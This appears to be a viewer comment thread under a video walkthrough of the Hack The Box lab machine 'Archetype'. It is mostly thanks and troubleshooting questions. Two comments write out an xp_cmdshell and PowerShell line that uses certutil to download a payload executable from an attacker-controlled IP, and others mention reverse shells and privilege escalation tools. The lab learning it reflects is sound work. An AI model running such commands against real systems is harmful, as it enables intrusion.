Комментарии:
I know its a year later, but I can't seem to ping the connection. I am connected using the Starting Point openVPN but it is still not working.
ОтветитьYour videos are so damn good man. I would pay for this content. Between the Practical Ethical Hacking course from TCM Security, and watching and taking notes during these videos, I have learned soo much. Thank you so much for creating such great content and doing it in a way that is approachable to people learning about this. You are an amazing resource in this community. I wish I lived overseas so I could buy you a pint!
Ответитьjust a heads up wget wasn't working for me on the host machine I tried with:
xp_cmdshell "powershell -c cd C:\Users\Public; certutil -urlcache -f IP:PORT/payload.exe payload.exe
and that was buggy as well
do you do actual write ups of these videos, Thanks
ОтветитьYour the best around nothing's ever gonna bring you down.
ОтветитьMine is giving me error - login failed for user 'ARCHETYPE\Guest'
I tried so many times but nothing is happening.
What should i do ?
Hey im having trouble with the wget i tried different ways to download too but i get the 200 code but after a long while on the windows server it just gives me a time out without actually downloading the file. when i dir it has 0 bytes
ОтветитьHi Mate... Hope you are doing good... You have done a real hard work to customize and categorize all the payloads... If possible... can you share the Payloads which you have categorized... it help us to explore more information by pointing to the right payloads... Hope you got my point... Thanks in Advance...😊
ОтветитьWhat amazing waikthrough. i love the way you teach us. I want to ask you where you got all this Vulnerability payload and script, any GitHub repository? Please share!
ОтветитьMy payload comes up as 0 bytes when I dir it using sql client. What gives?
ОтветитьThank you very much for the walkthrough. I have learnt so much! Please keep on doing the wonderful work.
I would like to ask some noob questions:
Why can't we login the administrator with mssqlclient but be able to login with psexec or evil-winrm?
They are all connecting to port 1433. I cannot understand the difference.
When I tried to use psexec to login sql_svc, it showed the smb files stating not writable. This confused me with smbclient.
This one took me forever but I learned a lot, getting those last 2 flags felt amazing!
ОтветитьMany thanks. Wasn't sure how to use the SQL commands but your video was ridiculously helpful again. I knew what I wanted to do, just wasn't sure how!
Anyway, wget wouldn't work for me using PWNBOX but "certutil -urlcache -f *IP:port*/file.exe file.exe" did. In case anyone has any problems trying to chain wget in the powershell commands.
I found the password myself also but it wasn't listed same as you, it was way above I actually stopped following once I got my files uploaded as you'd helped me enough.
Many thanks once again and I expect I'll be saying this again as I progress and find myself stuck 👍🏻👍🏻👍🏻
Just ran through this recently, and WinPeas did not return the file containing the admin password as demonstrated. The file didn't exist on the system for some reason. I had to use RoguePotato to get to the admin flag. Just a heads up in case someone hits the same wall I did
ОтветитьHelp it says "unable to connect to the remote server"
ОтветитьI use kali and I can't find winPEAS can someone help me ?
ОтветитьOh mister holy hackerman. What do i do when i cant transfer the payload because wget says it doesn't exist? On my listener it shows a message that the server used the get command error 404 file not found. What did i do wrong? I followed your video exacly. :(
Ответитьlocate doesnt work here
ОтветитьJust finished this one. I was surprised to see that the intended solution was to spawn a reverse shell! When I got access to the MS SQL server I noticed I could still run dir with the xp_cmdshell so I dir'ed my way through the whole thing 😂
ОтветитьNow thats alot of information thanku so much keep the good work up. 😍😍😍
ОтветитьThank you for explaining the alternatives!
keep it up
Great walkthrough.
ОтветитьJust now saw your playlist, it's really well explained... Keep hacking and post more videos💚✨
ОтветитьNice work.....good job....keep it up..... ❣️❣️
Ответить